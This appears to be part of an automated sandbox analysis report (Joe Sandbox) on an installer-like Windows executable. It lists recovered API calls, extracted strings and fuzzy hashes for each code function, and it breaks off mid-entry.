                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                  • API String ID: 190572456-212574377
                                                                                  • Opcode ID: 575c4cb06a2452c1401fa841c1313ffc0221effe76d11e7dd1aabe4620aafca8
                                                                                  • Instruction ID: 6c96be05a1394ea18707f7eb6152f5503904c11dec58d168239e3d414ffdbae6
                                                                                  • Opcode Fuzzy Hash: 575c4cb06a2452c1401fa841c1313ffc0221effe76d11e7dd1aabe4620aafca8
                                                                                  • Instruction Fuzzy Hash: 6FF0D0B0D00600DFE724EF369C8672736D5ABA871EF54943BA9499526AD778084ECE1C
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000,004817AB), ref: 0042EA45
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                                  • InterlockedExchange.KERNEL32(0049C668,00000001), ref: 0042EA5C
                                                                                    • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000), ref: 0042E9D2
                                                                                    • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                    • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049C660,00000001), ref: 0042E9E9
                                                                                  • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000), ref: 0042EA70
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                  • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                  • API String ID: 142928637-2676053874
                                                                                  • Opcode ID: 1a4120a275a7a58fb50942f7be9802eb4510f593f9b94c8c2bcf046027c2ff71
                                                                                  • Instruction ID: ee3a30ffd41cbbfe6d6edcae89b7e54a60ed140ac131bcc27b6a733ad903a47d
                                                                                  • Opcode Fuzzy Hash: 1a4120a275a7a58fb50942f7be9802eb4510f593f9b94c8c2bcf046027c2ff71
                                                                                  • Instruction Fuzzy Hash: 7FE06DA1741620BAEA10B7B66CC6FAA2668AB18B19F50103BF100A51D1C2BD0C80CA5D
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F0FD), ref: 0044C85F
                                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C870
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C880
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                  • API String ID: 2238633743-1050967733
                                                                                  • Opcode ID: 09135f5945541ae78a6af7b678b7c17e974eae42bf5bb0e3fde62042262af164
                                                                                  • Instruction ID: 3dac3c94951c3f326fc139052019a1d9618f5d358237ac6f028f958aa2bdce3c
                                                                                  • Opcode Fuzzy Hash: 09135f5945541ae78a6af7b678b7c17e974eae42bf5bb0e3fde62042262af164
                                                                                  • Instruction Fuzzy Hash: E6F01CB02823068BF750BBB1ECC5B263294E76570AF18117BA001A62E2D7BD4888CF1C
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,004992FC), ref: 00479062
                                                                                  • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047906F
                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047907F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                  • API String ID: 667068680-222143506
                                                                                  • Opcode ID: f2527f3e8acae3901293ffe8f3822438352d858e28b091300cd7299335f6a370
                                                                                  • Instruction ID: fd16aae75e34d792cc346ba171bb4a4eccdb771972da16ee3cf818c899e4fb82
                                                                                  • Opcode Fuzzy Hash: f2527f3e8acae3901293ffe8f3822438352d858e28b091300cd7299335f6a370
                                                                                  • Instruction Fuzzy Hash: F3C012F0A50740E9DA00B7B11CC3E7B256CD540B28720803B748D75183D57C0C044F3C
                                                                                  APIs
                                                                                  • GetFocus.USER32 ref: 0041B755
                                                                                  • GetDC.USER32(?), ref: 0041B761
                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B796
                                                                                  • RealizePalette.GDI32(00000000), ref: 0041B7A2
                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7D0
                                                                                  • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B804
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                  • String ID:
                                                                                  • API String ID: 3275473261-0
                                                                                  • Opcode ID: c0b27d3b7a66d9be5bed6a7f47b95188f2d45c1e9081e04c5e1905c96dbfd583
                                                                                  • Instruction ID: a2c5ddb66569cb6b77bb8b351ce757b8a6afb07cbb9f01b77a2eee85226ebd67
                                                                                  • Opcode Fuzzy Hash: c0b27d3b7a66d9be5bed6a7f47b95188f2d45c1e9081e04c5e1905c96dbfd583
                                                                                  • Instruction Fuzzy Hash: BB512F74A00208DFCB11DFA9C855AEEBBB9FF49704F104066F504A7390D7789981CBA9
                                                                                  APIs
                                                                                  • GetFocus.USER32 ref: 0041BA27
                                                                                  • GetDC.USER32(?), ref: 0041BA33
                                                                                  • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA6D
                                                                                  • RealizePalette.GDI32(00000000), ref: 0041BA79
                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA9D
                                                                                  • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAD1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                  • String ID:
                                                                                  • API String ID: 3275473261-0
                                                                                  • Opcode ID: 2ce40bb40bbcf4fda08707fe581e59aceef162c3ea3b02671fd4d2ee797de512
                                                                                  • Instruction ID: 9811d2e4aff7790a224b19fb8c07a8c8a8d7caa6f03daf8ca787c0bc2bb5238d
                                                                                  • Opcode Fuzzy Hash: 2ce40bb40bbcf4fda08707fe581e59aceef162c3ea3b02671fd4d2ee797de512
                                                                                  • Instruction Fuzzy Hash: 48512974A002189FCB11DFA9C891AAEBBF9FF48700F15806AF504EB751D7789D40CBA4
                                                                                  APIs
                                                                                  • GetFocus.USER32 ref: 0041B58E
                                                                                  • GetDC.USER32(?), ref: 0041B59A
                                                                                  • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5B6
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5D3
                                                                                  • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5EA
                                                                                  • ReleaseDC.USER32(?,?), ref: 0041B636
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                  • String ID:
                                                                                  • API String ID: 2502006586-0
                                                                                  • Opcode ID: 93cc6d3c32f59bb0d3866a424ed22eeeeb8d669c97e98ac0717914e792a0e722
                                                                                  • Instruction ID: 54132ba296c0afcfcf6bcc6108250e3b4accff89e00e7de8f4d517709d1e9298
                                                                                  • Opcode Fuzzy Hash: 93cc6d3c32f59bb0d3866a424ed22eeeeb8d669c97e98ac0717914e792a0e722
                                                                                  • Instruction Fuzzy Hash: CF41D571A04258AFCB10DFA9C885A9FBBB4EF55704F1484AAF500EB351D3389D11CBA5
                                                                                  APIs
                                                                                  • SetLastError.KERNEL32(00000057,00000000,0045D1C0,?,?,?,?,00000000), ref: 0045D15F
                                                                                  • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D22C,?,00000000,0045D1C0,?,?,?,?,00000000), ref: 0045D19E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                  • API String ID: 1452528299-1580325520
                                                                                  • Opcode ID: e5d6d334a763e1cbb8f1666fe6de59715d05f57489b5bab2b54e19ba110a4e8d
                                                                                  • Instruction ID: 7b2924e434c2d2a6e8a64b45c898520acf8211660a530507fefc98e5318dd698
                                                                                  • Opcode Fuzzy Hash: e5d6d334a763e1cbb8f1666fe6de59715d05f57489b5bab2b54e19ba110a4e8d
                                                                                  • Instruction Fuzzy Hash: C911D535A04A04AFDB31DEA1C941A9E76ADDF44306F6040777C00A2783D63C9F0AD52E
                                                                                  APIs
                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                  • GetDC.USER32(00000000), ref: 0041BDF9
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE20
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE2D
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041BE66
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceMetricsSystem$Release
                                                                                  • String ID:
                                                                                  • API String ID: 447804332-0
                                                                                  • Opcode ID: e7ae0f99dd269f353d7b7641ed485f387b8aeae4be2e5651bec5d04fa653b95a
                                                                                  • Instruction ID: e886330f15f7a5316131e86c26d6fb078e3572472e198ea0fe97a07bc4f3c0b5
                                                                                  • Opcode Fuzzy Hash: e7ae0f99dd269f353d7b7641ed485f387b8aeae4be2e5651bec5d04fa653b95a
                                                                                  • Instruction Fuzzy Hash: 54212A74E04748AFEB00EFA9C942BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0049C420,00000000,00401B68), ref: 00401ABD
                                                                                  • LocalFree.KERNEL32(00598500,00000000,00401B68), ref: 00401ACF
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00598500,00000000,00401B68), ref: 00401AEE
                                                                                  • LocalFree.KERNEL32(00599500,?,00000000,00008000,00598500,00000000,00401B68), ref: 00401B2D
                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049C420,00401B6F), ref: 00401B58
                                                                                  • RtlDeleteCriticalSection.KERNEL32(0049C420,00401B6F), ref: 00401B62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3782394904-0
                                                                                  • Opcode ID: 881435858a3df7288aae927e3c0e93e2fd7e3e12d101c835c3d014fcf42cc859
                                                                                  • Instruction ID: ece8596464e12e4b83b5bd96c0fd07c419ca8ccd111934747786d766a0fa6b25
                                                                                  • Opcode Fuzzy Hash: 881435858a3df7288aae927e3c0e93e2fd7e3e12d101c835c3d014fcf42cc859
                                                                                  • Instruction Fuzzy Hash: AC119D30B403405BEB15ABA59CE2B363BE4A765708F94007BF40067AF1D67C984087AE
                                                                                  APIs
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047EBEA
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CE49), ref: 0047EC10
                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0047EC20
                                                                                  • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047EC41
                                                                                  • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047EC55
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047EC71
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long$Show
                                                                                  • String ID:
                                                                                  • API String ID: 3609083571-0
                                                                                  • Opcode ID: 5cd40674e0b8a30ca8b6933e71840c0df1b24ef64ec96d3901f5dc784d2e9b41
                                                                                  • Instruction ID: c412bc1a630f4fb8f5d2bcb23b9cdd23b166c0171215975471963c460da52ad8
                                                                                  • Opcode Fuzzy Hash: 5cd40674e0b8a30ca8b6933e71840c0df1b24ef64ec96d3901f5dc784d2e9b41
                                                                                  • Instruction Fuzzy Hash: 13014CB6651210AFD710DB69CE85F2637D8AB0D330F0946A6B549EF2E3C228DC408B08
                                                                                  APIs
                                                                                    • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                  • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                    • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                  • String ID:
                                                                                  • API String ID: 3527656728-0
                                                                                  • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                  • Instruction ID: f7789479bb42d6d63a82e92436423a6fea40f6b6a905c0023d8cad956bbacbbe
                                                                                  • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                  • Instruction Fuzzy Hash: BAF072B56015019BDE00FFBAD9CAE4B77989F043097088457B944DF197C97DD8548B3D
                                                                                  APIs
                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                  • ShowWindow.USER32(?,00000005,00000000,00498699,?,?,00000000), ref: 0049846A
                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                    • Part of subcall function 004072B8: SetCurrentDirectoryA.KERNEL32(00000000,?,00498492,00000000,00498665,?,?,00000005,00000000,00498699,?,?,00000000), ref: 004072C3
                                                                                    • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,00456126,00000000,0045618E), ref: 0042D491
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                  • String ID: .dat$.msg$IMsg$Uninstall
                                                                                  • API String ID: 3312786188-1660910688
                                                                                  • Opcode ID: 7b37453165c360702e9c28103bf074bd5e317765a346751ca472e497e5ab201f
                                                                                  • Instruction ID: 94d9a00f42835dc9211730c265b92997509a8ce46d72803125f61036d3c10121
                                                                                  • Opcode Fuzzy Hash: 7b37453165c360702e9c28103bf074bd5e317765a346751ca472e497e5ab201f
                                                                                  • Instruction Fuzzy Hash: 22315574A00114AFCB00FF69DC52D9EBBB5EB49318F51847AF810AB751DB39AD04CB58
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                  • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                  • API String ID: 828529508-2866557904
                                                                                  • Opcode ID: d7b5e8f06d25cf2e82843ddd2a686aee5f6cfebd975f7e169ae89c51933d11b0
                                                                                  • Instruction ID: 8013201a01c1a3ce4b1282a4ea415291a3823007c30eea77c81bb12cf145ddb4
                                                                                  • Opcode Fuzzy Hash: d7b5e8f06d25cf2e82843ddd2a686aee5f6cfebd975f7e169ae89c51933d11b0
                                                                                  • Instruction Fuzzy Hash: 34F0C8D174066137E620A57F9C83F6B598C8F94759F140436F109E62C1D96C9905426E
                                                                                  APIs
                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004580D0
                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 004580F1
                                                                                  • CloseHandle.KERNEL32(?,00458124), ref: 00458117
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                  • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                  • API String ID: 2573145106-3235461205
                                                                                  • Opcode ID: 48654442b45b242062e68cf3d97dab4c0ed917fb54e1286c856b08e600caecae
                                                                                  • Instruction ID: eff4a35bea7a62289d80d9c26220f44f895e3d9a2531d43f7f7dfd5bd268873c
